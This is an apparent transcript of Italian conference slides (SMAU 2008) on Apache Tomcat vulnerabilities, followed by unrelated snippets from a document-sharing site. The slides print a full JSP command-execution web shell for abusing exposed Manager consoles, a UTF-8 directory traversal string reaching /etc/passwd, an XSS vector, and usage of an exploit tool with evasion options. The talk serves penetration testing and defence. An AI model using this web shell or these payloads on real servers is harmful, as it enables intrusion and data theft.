Vulnerabilità in Apache Tomcat

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Vulnerabilità in Apache Tomcat"

Transcript

1 Vulnerabilità in Apache Tomcat L evoluzione della specie il mondo della sicurezza è una giungla! SMAU 2008

2 Di cosa parliamo oggi... Quali sono le principali vulnerabilità scoperte in Apache Tomcat Come sfruttare queste debolezze, dal punto di vista dell'aggressore Quali vulnerabilità ci dobbiamo aspettare nel futuro prossimo Attualmente lavoro come pentester in una grande banca internazionale Ricerco vulnerabilità for fun (and profit) Mi interesso di web application security ed ethical hacking Sono membro della comunita OWASP btw: partecipate al capitolo Italiano :) luca.carettoni[at]ikkisoft[dot]com

3 Security in depth Application Security Web Server Security Database Security Operating System Security Network Security Physical Security

4 Apache Tomcat Apache Tomcat è un moderno Servlet container sviluppato dall'apache Software Foundation Pure 100% Java Application Server Open Source, facile da installare, abbastanza performante...quindi, praticamente perfetto? Non proprio Implementa diverse versioni delle tecnologie Java Servlet e Java Server Pages (JSP) Servlet/JSP Specification 2.5/ / / /1.1 Apache Tomcat version (deprecata)

5 Powered by Apache Tomcat E' stato scaricato più di 10 milioni di volte. Ipotizziamo che solamente l'1% di questi download ha portato all'utilizzo in produzione, il risultato è assolutamente sconvolgente Parliamo di più di installazioni Largamente utilizzato da numerose organizzazioni e società: WalMart, O'Reilly On Java, JBOSS ed il portale Italiano VolareGratis.com Si stima che circa la metà della global Fortune 500 utilizzi in una qualche installazione Tomcat e derivati Date un occhio alla popolarità del sito: s/tomcat.html

6 Tomcat in the wild... Google dork: 12,600 for intitle:"directory Listing For /" + inurl:tomcat-docs tomcat

7 Tactical Exploiting 1/3 Spesso l'aggressore non deve nemmeno sfruttare vulnerabilità Sono gli amministratori che lasciano accessibile una risorsa preziosa Default Manager Console LambdaProbe Console Spesso esposta Spesso protetta da password non robuste Per la mia esperienza, troppo spesso!

8 Tactical Exploiting 2/3

9 Tactical Exploiting 3/3 Oltre ad ottenere informazioni sulla configurazione e sullo stato dei sistemi, un aggressore può alterare le configurazioni e compromettere l'ambiente di fruizione! Vediamo, in breve, come: page import="java.io." %><%try { Runtime rt = Runtime.getRuntime(); String cmd = request.getparameter("cmd"); Process ps = rt.exec(cmd); BufferedReader outreader = new BufferedReader(new InputStreamReader( ps.getinputstream())); BufferedReader errreader = new BufferedReader(new InputStreamReader( ps.geterrorstream())); String outline = null; String errline = null; out.println("<pre>"); while ((outline = outreader.readline())!= null (errline = errreader.readline())!= null) { if (outline!= null) out.println("out: " + outline); if (errline!= null) out.println("err: " + errline); } out.println("</pre>"); outreader.close(); errreader.close(); } catch (Exception ex) { out.println("exception message. Some problem?!?"); ex.printstacktrace(); }%>

10 Apache Tomcat - Cronologia La code base iniziale e' stata donata da Sun all' Apache Software Foundation nel 1999 La prima versione ufficiale è stata la v x x x x La versione attuale è la (ad oggi, 18/10/08) Fonte: en.wikipedia.org

11 Vulnerabilità in Tomcat 1/2 #81 Vulnerabilità segnalate #44 CVE (vulnerabilità univoche) Vulnerabilità per versione: Apache Tomcat JK Connectors: #3 CVE Apache Tomcat 4.x: #35 CVE Apache Tomcat 5.x: #24 CVE Apache Tomcat 6.x: #19 CVE Source: (11 September 2008)

12 Vulnerabilità in Tomcat 2/2 CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE Source: (11 September 2008)

13 Vulnerabilità per anno CVEs

14 Vulnerabilità per severità Low High Medium Low: Info Disclosure, Denial of Service Medium: Sensitive Info Disclosure, Cross Site Scripting, Session Hijacking High: Directory Traversal, Lettura/Scrittura File Arbitrari, Esecuzione di Codice Arbitrario

15 Qualche esempio

16 CVE Directory Traversal Vulnerability Author: Simon Ryeo Severity: High Version Affected: , , 4.1.x Exploit Proof-of-concept: %c0%ae/%c0%ae%c0%ae/etc/passwd Note: context.xml oppure server.xml deve permettere allowlinking e URIencoding come UTF8. UTF-8 Encoding 2 bytes, 11bits, 110bbbbb 10bbbbbb %c0%ae =. %c0%af = /

17 CVE Multiple Cross Site Scripting (XSS) Author: Unknown (reported to JPCERT) Severity: Medium Version Affected: , , , , Exploit Proof-of-concept: Note: Nessun tipo di validazione. Il classico vettore di attacco <script>alert(123);</script> viene correttamente inoltrato

18 CVE Directory Listing Vulnerability Author: ScanAlert.s Enterprise Services Team Severity: Medium Version Affected: , , , Exploit Proof-of-concept: Note: Vulnerabile invocando qualsiasi risorsa (estensione) valida, anche se non esistente, preceduta da un punto e virgola

19 Tomcat ZOO The «all-in-one» exploit Pentesting tool, specifico per verificare vulnerabilità note di Apache Tomcat Sviluppato in PHP (richiede solo enable-cli) Rilasciato GPL v2 Attualmente copre il 27% dei CVE per Tomcat: CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE CVE [ Script Options (basic) ] Usage:php TomcatZOO.php host port proxy host: target server port: the web port, usually 8080 proxy: use a proxy defined as IP:PORT:USER:PASS (optional) Example: php TomcatZOO.php php TomcatZOO.php :1234:: php TomcatZOO.php :8080:ikki:pass

20 Tomcat ZOO The «all-in-one» exploit Caratteristiche avanzate: Supporto HTTP (senza l'uso di libcurl) Supporto Proxy Opzione di debug Personalizzazione User-Agent Primitive tecniche di evasione 1: fake HTTP GET/POST parameters 2: random case sensitivity 3: Windows directory separator \ instead of / 4: URL encoding applied to URI, HTTP pars and header ToDo: Supporto HTTPS (per ora utilizzate l'ottimo Thx Michal!) Coprire la globalità delle vulnerabilità di Tomcat analizzabili durante black box testing

21 Tomcat ZOO The «all-in-one» exploit Disponibile prossimamente (entro fine anno) Lo troverete qui: E' un tool per ethical hacking!

22 E nel futuro... Ancora problematiche di validazione dell'input, sebbene il codice si sta stabilizzando Sicuramente ancora Denial of Service, considerando la numerosità e la complessità dei componenti Sicuramente ancora Cross-Site Scripting (Tendenzialmente) nessun buffer overflow. I componenti non sviluppati in Java sono limitati Come difenderci quindi? Reattività: mantenersi aggiornati e preparare già ora un ambiente di test dove provare le future release, prima della messa in produzione. Estote Parati! Online patching: Application firewall e simili, pronti per essere configurati ad-hoc appena viene rilasciata una nuova vulnerabilità

23 Contatti, Domande Grazie dell'attenzione! Domande?!? Luca Carettoni luca.carettoni[at]ikkisoft[dot]com

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

Primi passi con Apache Tomcat. L application server dell Apache group

Primi passi con Apache Tomcat. L application server dell Apache group Primi passi con Apache Tomcat L application server dell Apache group 2 J2EE Direttive Sun Microsystem Che cos è un application server EJB Maggiori application server open source 3 Tomcat Open Source e

Dettagli

Application Server per sviluppare applicazioni Java Enterprise

Application Server per sviluppare applicazioni Java Enterprise Application Server per sviluppare applicazioni Java Enterprise Con il termine Application Server si fa riferimento ad un contenitore, composto da diversi moduli, che offre alle applicazioni Web un ambiente

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

Scritto mercoledì 1 agosto 2012 13:52 sul sito informaticamente.pointblog.it

Scritto mercoledì 1 agosto 2012 13:52 sul sito informaticamente.pointblog.it Vulnerabilità dei CMS Joomla, Wordpress, ecc. Articoli tratti dal sito html.it e informaticamente.pointblog.it -------------------------------------------------------------------------------------------------------------

Dettagli

Penetration Test Integrazione nell'attività di internal auditing

Penetration Test Integrazione nell'attività di internal auditing Parma 6 giugno 2008 Penetration Test Integrazione nell'attività di internal auditing CONTENUTI TI AUDIT mission e organizzazione REVISIONE TECNICA mission e organizzazione INTERNAL SECURITY ASSESSMENT

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

RSA Sun Insurance Office Ltd

RSA Sun Insurance Office Ltd RSA Sun Insurance Office Ltd Web Application Security Assessment (http://rsage49:9080/sisweb) Hacking Team S.r.l. Via della Moscova, 13 20121 MILANO (MI) - Italy http://www.hackingteam.it info@hackingteam.it

Dettagli

PHP e Java ovvero come poter sfruttare entrambi i linguaggi e vivere felici... forse

PHP e Java ovvero come poter sfruttare entrambi i linguaggi e vivere felici... forse PHP e Java ovvero come poter sfruttare entrambi i linguaggi e vivere felici... forse Relatore: Matteo Baccan matteo@baccan.it Data: Roma 24/1/2009 Target: Programmatori PHP, Java e semplici curiosi Difficoltà:

Dettagli

Guida all Installazione della Binary Release di OpenSPCoop2. Guida all Installazione della Binary Release di OpenSPCoop2

Guida all Installazione della Binary Release di OpenSPCoop2. Guida all Installazione della Binary Release di OpenSPCoop2 Guida all Installazione della Binary Release di OpenSPCoop2 i Guida all Installazione della Binary Release di OpenSPCoop2 Guida all Installazione della Binary Release di OpenSPCoop2 ii Copyright 2005-2015

Dettagli

VULNERABILITY ASSESSMENT E PENETRATION TEST

VULNERABILITY ASSESSMENT E PENETRATION TEST VULNERABILITY ASSESSMENT E PENETRATION TEST Una corretta gestione della sicurezza si basa innanzitutto su un adeguata conoscenza dell attuale livello di protezione dei propri sistemi. Partendo da questo

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it CMS Hacking Analisi del rischio di utilizzo di applicazioni di terze parti Gabriele Buratti www.isc2chapter-italy.it Agenda Definizione di CMS Rischi e tendenze (e le ragioni di ciò) Attacchi recenti Perchè

Dettagli

Corso Android Corso Online Sviluppo su Cellulari con Android

Corso Android Corso Online Sviluppo su Cellulari con Android Corso Android Corso Online Sviluppo su Cellulari con Android Accademia Futuro info@accademiafuturo.it Programma Generale del Corso di Sviluppo su Cellulari con Android Programma Base Modulo Uno - Programmazione

Dettagli

Early Warning. Bollettino VA-IT-130911-01.A

Early Warning. Bollettino VA-IT-130911-01.A Early Warning Bollettino VA-IT-130911-01.A Guida alla corretta lettura della scheda riassuntiva Early Warning - Bollettino VA-IT-130911-01.A Pag. 2/6 P U B L I C CORRISPONDENZE EARLY WARNING INFORMAZIONI

Dettagli

DEL SENDER GUIDA INTEGRATIVA ALL INSTALLAZIONE. Versione N.1.0. Data 11/05/2009. Sender - Guida integrativa alla installazione

DEL SENDER GUIDA INTEGRATIVA ALL INSTALLAZIONE. Versione N.1.0. Data 11/05/2009. Sender - Guida integrativa alla installazione GUIDA INTEGRATIVA ALL INSTALLAZIONE DEL SENDER Versione N.1.0 Data 11/05/2009 Versione 1.0, Data emissione 11/05/2009 Pag. 1 di 15 Revisione Capitolo Modifica Data 1.0 Prima Emissione 11/05/2009 Versione

Dettagli

Domenico Ercolani Come gestire la sicurezza delle applicazioni web

Domenico Ercolani Come gestire la sicurezza delle applicazioni web Domenico Ercolani Come gestire la sicurezza delle applicazioni web Agenda Concetti generali di sicurezza applicativa La soluzione IBM La spesa per la sicurezza non è bilanciata Sicurezza Spesa Buffer Overflow

Dettagli

Le scelte tecnologiche di RUP System

Le scelte tecnologiche di RUP System Cremona 22 novembre 2007 Le scelte tecnologiche di System - Metarete Linguaggio di programmazione Linguaggio di programmazione: Java Semplice e robusto Orientato agli oggetti Indipendente dalla piattaforma

Dettagli

Introduzione al tema delle minacce di Phishing 3.0 attraverso tecniche di Cross Application Scripting

Introduzione al tema delle minacce di Phishing 3.0 attraverso tecniche di Cross Application Scripting Introduzione al tema delle minacce di Phishing 3.0 attraverso tecniche di Cross Application Scripting Relatori: Emanuele Gentili Alessandro Scoscia Emanuele Acri PHISHING: l eterna lotta tra Sviluppatori

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Oggetto: MASTER DI ALTA FORMAZIONE PROFESSIONALE IN PROGRAMMATORE JAVA PARTECIPAZIONE GRATUITA

Oggetto: MASTER DI ALTA FORMAZIONE PROFESSIONALE IN PROGRAMMATORE JAVA PARTECIPAZIONE GRATUITA Oggetto: MASTER DI ALTA FORMAZIONE PROFESSIONALE IN PROGRAMMATORE JAVA PARTECIPAZIONE GRATUITA Salerno Formazione, società operante nel settore della didattica, della formazione professionale e certificata

Dettagli

Virtually Pwned Hacking VMware. Claudio Criscione @paradoxengine c.criscione@securenetwork.it

Virtually Pwned Hacking VMware. Claudio Criscione @paradoxengine c.criscione@securenetwork.it Virtually Pwned Hacking VMware Claudio Criscione @paradoxengine c.criscione@securenetwork.it /me Claudio Criscione Il contesto Violare la virtualizzazione significa... hacking al di sotto accedere direttamente

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Guida all Installazione del ProxyFatturaPA

Guida all Installazione del ProxyFatturaPA i Guida all Installazione del ii Copyright 2005-2014 Link.it srl iii Indice 1 Introduzione 1 2 Fase Preliminare 1 3 Esecuzione dell Installer 1 4 Fase di Dispiegamento 5 4.1 JBoss 5.x e 6.x....................................................

Dettagli

Corso di Web programming Modulo T3 A2 - Web server

Corso di Web programming Modulo T3 A2 - Web server Corso di Web programming Modulo T3 A2 - Web server 1 Prerequisiti Pagine statiche e dinamiche Pagine HTML Server e client Cenni ai database e all SQL 2 1 Introduzione In questa Unità si illustra il concetto

Dettagli

Risorsa N 038000. Dal 09/2010 al 08/2011: Corso Cisco CCNA Networking Associate Dal 07/2014 al 08/2014: Corso Cisco CCNA Security Networking Associate

Risorsa N 038000. Dal 09/2010 al 08/2011: Corso Cisco CCNA Networking Associate Dal 07/2014 al 08/2014: Corso Cisco CCNA Security Networking Associate DATI ANAGRAFICI: Nato nel : 1988 Nato e Residente a : Roma Risorsa N 038000 FORMAZIONE E CORSI: Dal 09/2010 al 08/2011: Corso Cisco CCNA Networking Associate Dal 07/2014 al 08/2014: Corso Cisco CCNA Security

Dettagli

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente

Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente Programma Introduzione a Windows XP Professional Esplorazione delle nuove funzionalità e dei miglioramenti Risoluzione dei problemi mediante Guida in linea e supporto tecnico Gruppi di lavoro e domini

Dettagli

PAWAS. Gestione sicurezza applicativa

PAWAS. Gestione sicurezza applicativa PAWAS Gestione sicurezza applicativa Sicurezza applicativa P.A. Portali web sicuri CON PAWAS GARANTISCI LA SICUREZZA APPLICATIVA DEI SERVIZI ONLINE DELLA PUBBLICA AMMINISTRAZIONE. Sempre più frequenti

Dettagli

Il web server Apache Lezione n. 3. Introduzione

Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

Corso Programmazione Java Android. Programma

Corso Programmazione Java Android. Programma Corso Programmazione Java Android Programma 1.1 Obiettivo e modalità di fruizione L obiettivo del corso è di fornire le conoscenze tecniche e metodologiche per svolgere la professione di Programmatore

Dettagli

Corso Android Corso Online Programmatore Android

Corso Android Corso Online Programmatore Android Corso Android Corso Online Programmatore Android Accademia Domani Via Pietro Blaserna, 101-00146 ROMA (RM) info@accademiadomani.it Programma Generale del Corso Modulo Uno - Programmazione J2ee 1) Programmazione

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Introduzione alle problematiche di hacking

Introduzione alle problematiche di hacking Introduzione alle problematiche di hacking Approfondire ed applicare le tecniche utilizzate dagli esperti di sicurezza, per far fronte agli attacchi informatici ed alle più comuni problematiche a cui i

Dettagli

SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL

SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL SPECIFICA DI ASSESSMENT PER I SERVIZI BPOL E BPIOL ver.: 1.0 del: 21/12/05 SA_Q1DBPSV01 Documento Confidenziale Pagina 1 di 8 Copia Archiviata Elettronicamente File: SA_DBP_05_vulnerability assessment_sv_20051221

Dettagli

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Rosario Valotta Matteo Carli Indice Attacco alle WebMail basate su Memova:... 1 tampering dei parametri di inoltro automatico...

Dettagli

Introduzione a XAMPP. Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica

Introduzione a XAMPP. Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica Introduzione a XAMPP Andrea Atzeni (shocked@polito.it) Marco Vallini (marco.vallini@polito.it) Politecnico di Torino Dip. Automatica e Informatica Introduzione applicazione web richiede diversi componenti

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603 Fax +39.02.63118946

Dettagli

Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione

Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione Trend Micro Worry-Free Business Security 8.0 Suggerimenti e stratagemmi per la 1 configurazione Anti-spyware Anti-spam Antivirus Anti-phishing Filtro di contenuti e URL Best practice, preparazioni e istruzioni

Dettagli

Business Intelligence. strumento per gli Open Data

Business Intelligence. strumento per gli Open Data Business Intelligence strumento per gli Open Data Progetti di innovazione Progetti di innovazione negli Enti Locali Perchè? Forte cultura dell'adempimento Minore sensibilità per la verifica dei servizi

Dettagli

Caratteristiche generali

Caratteristiche generali Caratteristiche generali Tecnologie utilizzate Requisiti software/hardware Modalità di installazione del database del PSDR INSTALLAZIONE PSDR Installazione on-line Installazione off-line Primo avvio Riservatezza

Dettagli

Applicazioni web. Sommario. Parte 6 Servlet Java. Applicazioni web - Servlet. Alberto Ferrari 1. Servlet Introduzione alle API ed esempi

Applicazioni web. Sommario. Parte 6 Servlet Java. Applicazioni web - Servlet. Alberto Ferrari 1. Servlet Introduzione alle API ed esempi Applicazioni web Parte 6 Java Alberto Ferrari 1 Sommario Introduzione alle API ed esempi Tomcat Server per applicazioni web Alberto Ferrari 2 Alberto Ferrari 1 Java: da applet a servlet In origine Java

Dettagli

Individuare Web Shell nocive con PHP Shell

Individuare Web Shell nocive con PHP Shell http://www.readability.com/articles/7e9rlg94 html.it ORIGINAL PAGE Individuare Web Shell nocive con PHP Shell Detector by ANDREA DRAGHETTI Una shell Web è uno script, comunemente scritto in PHP, in grado

Dettagli

Offerta per attività di Vulnerability Assessment per Portale Servizi del Personale

Offerta per attività di Vulnerability Assessment per Portale Servizi del Personale Milano, 29 Giugno 2005 Spett.le Infocom Via Gandhi 21017 Samarate n. 20050505.mb18b Alla cortese attenzione: Sig. Ruggero Toia Oggetto: per attività di Vulnerability Assessment per Portale Servizi del

Dettagli

GovPay 2.0. Manuale Installazione

GovPay 2.0. Manuale Installazione SERVIZI DI INTERMEDIAZIONE AL NODO DEI PAGAMENTI GovPay-ManualeInstallazione del 16/12/2015 - vers. 1 STATO DEL DOCUMENTO REV. DESCRIZIONE DATA 1 Prima versione 16/12/2015 ATTORI DEL DOCUMENTO Redatto

Dettagli

Architetture Web: un ripasso

Architetture Web: un ripasso Architetture Web: un ripasso Pubblicazione dinamica di contenuti. Come si fa? CGI Java Servlet Server-side scripting e librerie di tag JSP Tag eseguiti lato server Revisione critica di HTTP HTTP non prevede

Dettagli

Software utilizzato per le esercitazioni

Software utilizzato per le esercitazioni SW Software utilizzato per le esercitazioni Software utilizzato per le esercitazioni Editor testuale per pagine html, xhtml, css Browser Web server Motore Php Motore JSP JDK JSDK Ambiente di sviluppo Java

Dettagli

CORSO WEB SERVER, DBMS E SERVER FTP

CORSO WEB SERVER, DBMS E SERVER FTP CORSO WEB SERVER, DBMS E SERVER FTP DISPENSA LEZIONE 1 Autore D. Mondello Transazione di dati in una richiesta di sito web Quando viene effettuata la richiesta di un sito Internet su un browser, tramite

Dettagli

Flavio De Paoli depaoli@disco.unimib.it

Flavio De Paoli depaoli@disco.unimib.it Flavio De Paoli depaoli@disco.unimib.it 1 Il web come architettura di riferimento Architettura di una applicazione web Tecnologie lato server: Script (PHP, Pyton, Perl), Servlet/JSP, ASP Tecnologie lato

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Il Web, HTML e Java Corso di Laurea in Ingegneria Informatica Progetto S.C.E.L.T.E.

Il Web, HTML e Java Corso di Laurea in Ingegneria Informatica Progetto S.C.E.L.T.E. Il Web, HTML e Java Corso di Laurea in Ingegneria Informatica Progetto S.C.E.L.T.E. Università di Bologna Facoltà di Ingegneria Bologna, 08/02/2010 Outline Da applicazioni concentrate a distribuite Modello

Dettagli

Sophos Deployment Packager guida per utenti. Versione prodotto: 1.2

Sophos Deployment Packager guida per utenti. Versione prodotto: 1.2 Sophos Deployment Packager guida per utenti Versione prodotto: 1.2 Data documento: settembre 2014 Sommario 1 Informazioni sulla guida...3 2 Deployment Packager...4 2.1 Problemi noti e limiti del Deployment

Dettagli

Corso di Informatica Modulo T3 B2 - Database in rete

Corso di Informatica Modulo T3 B2 - Database in rete Corso di Informatica Modulo T3 B2 - Database in rete 1 Prerequisiti Programmazione web Applicazione web Modello OSI Architettura client/server Conoscenze generali sui database Tecnologia ADO in Visual

Dettagli

REGIONE BASILICATA UFFICIO S. I. R. Standard Tecnologici dei Sistemi Informativi

REGIONE BASILICATA UFFICIO S. I. R. Standard Tecnologici dei Sistemi Informativi UFFICIO S. I. R. Standard Tecnologici dei Sistemi Informativi Autori: Dott.ssa Domenica Nardelli (P.O.C. Area Applicativa Ufficio SIR) Data di creazione: 03 Ottobre 2005 Ultimo aggiornamento: 03 Ottobre

Dettagli

LA TECNOLOGIA CONTRO L HACKING

LA TECNOLOGIA CONTRO L HACKING LA TECNOLOGIA CONTRO L HACKING LUCA EMILI RODOLFO ROSINI GIORGIO VERDE E*MAZE Networks S.p.A. I punti che verranno trattati: La sicurezza di siti web, piattaforme di e-business e sistemi di pagamento on-line.

Dettagli

Programmazione server-side: Java Servlet

Programmazione server-side: Java Servlet Programmazione server-side: Java Servlet Corso di Applicazioni Telematiche A.A. 2006-07 Lezione n.11 parte II Prof. Roberto Canonico Università degli Studi di Napoli Federico II Facoltà di Ingegneria Cos

Dettagli

Firewall applicativo per la protezione di portali intranet/extranet

Firewall applicativo per la protezione di portali intranet/extranet Firewall applicativo per la protezione di portali intranet/extranet Descrizione Soluzione Milano Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI)

Dettagli

The ultimate guide of: Mac OS X Snow Leopard, Informix, PHP 5.3 & PDO

The ultimate guide of: Mac OS X Snow Leopard, Informix, PHP 5.3 & PDO The ultimate guide of: Mac OS X Snow Leopard, Informix, PHP 5.3 & PDO 1. Introduzione Nel mio ultimo articolo Mac OS X Snow Leopard: Informix IDS 11.5 + PHP 5.3 (Musarra, 2009) è stato spiegato come installare

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Versione 2 Milano 14 Luglio 2006 Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603

Dettagli

KLEIS A.I. SECURITY SUITE

KLEIS A.I. SECURITY SUITE KLEIS A.I. SECURITY SUITE Protezione dei servizi non web Kleis A.I. SecureMail, Kleis A.I. SecureEmulation, Kleis A.I. SecureXEmulation, Kleis A.I. SecureTransfer, Kleis A.I. SecureShare www.kwaf.it Protezione

Dettagli

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii

Indice generale. Parte I Anatomia del Web...21. Introduzione...xiii Indice generale Introduzione...xiii Capitolo 1 La sicurezza nel mondo delle applicazioni web...1 La sicurezza delle informazioni in sintesi... 1 Primi approcci con le soluzioni formali... 2 Introduzione

Dettagli

Guida veloce ai. Hacks

Guida veloce ai. Hacks Guida veloce ai OK Hacks Techweaver11.altervista.org Copyright by Techweaver tutti i diritti riservati, no copia ne opere derivate senza il consenso dell autore 1 Introduzione Questa mini guida è stata

Dettagli

Introduzione al linguaggio Java: Servlet e JSP

Introduzione al linguaggio Java: Servlet e JSP Introduzione al linguaggio Java: Servlet e JSP Corso di Gestione della Conoscenza d Impresa A. A. 2006/2007 Dipartimento di Informatica Università degli Studi di Bari 1 Servlet e JSP: il contesto Un applicazione

Dettagli

INFN Napoli NESSUS. IL Security Scanner. Francesco M. Taurino 1

INFN Napoli NESSUS. IL Security Scanner. Francesco M. Taurino 1 NESSUS IL Security Scanner Francesco M. Taurino 1 La vostra RETE Quali servizi sono presenti? Sono configurati in modo sicuro? Su quali macchine girano? Francesco M. Taurino 2 Domanda Quanto e sicura la

Dettagli

Console di Amministrazione Centralizzata Guida Rapida

Console di Amministrazione Centralizzata Guida Rapida Console di Amministrazione Centralizzata Contenuti 1. Panoramica... 2 Licensing... 2 Panoramica... 2 2. Configurazione... 3 3. Utilizzo... 4 Gestione dei computer... 4 Visualizzazione dei computer... 4

Dettagli

Note pratiche sullo sviluppo di servlet (I)

Note pratiche sullo sviluppo di servlet (I) Note pratiche sullo sviluppo di servlet (I) Nel caso in cui sulla macchina locale (PC in laboratorio/pc a casa/portatile) ci sia a disposizione un ambiente Java (con compilatore) e un editor/ambiente di

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

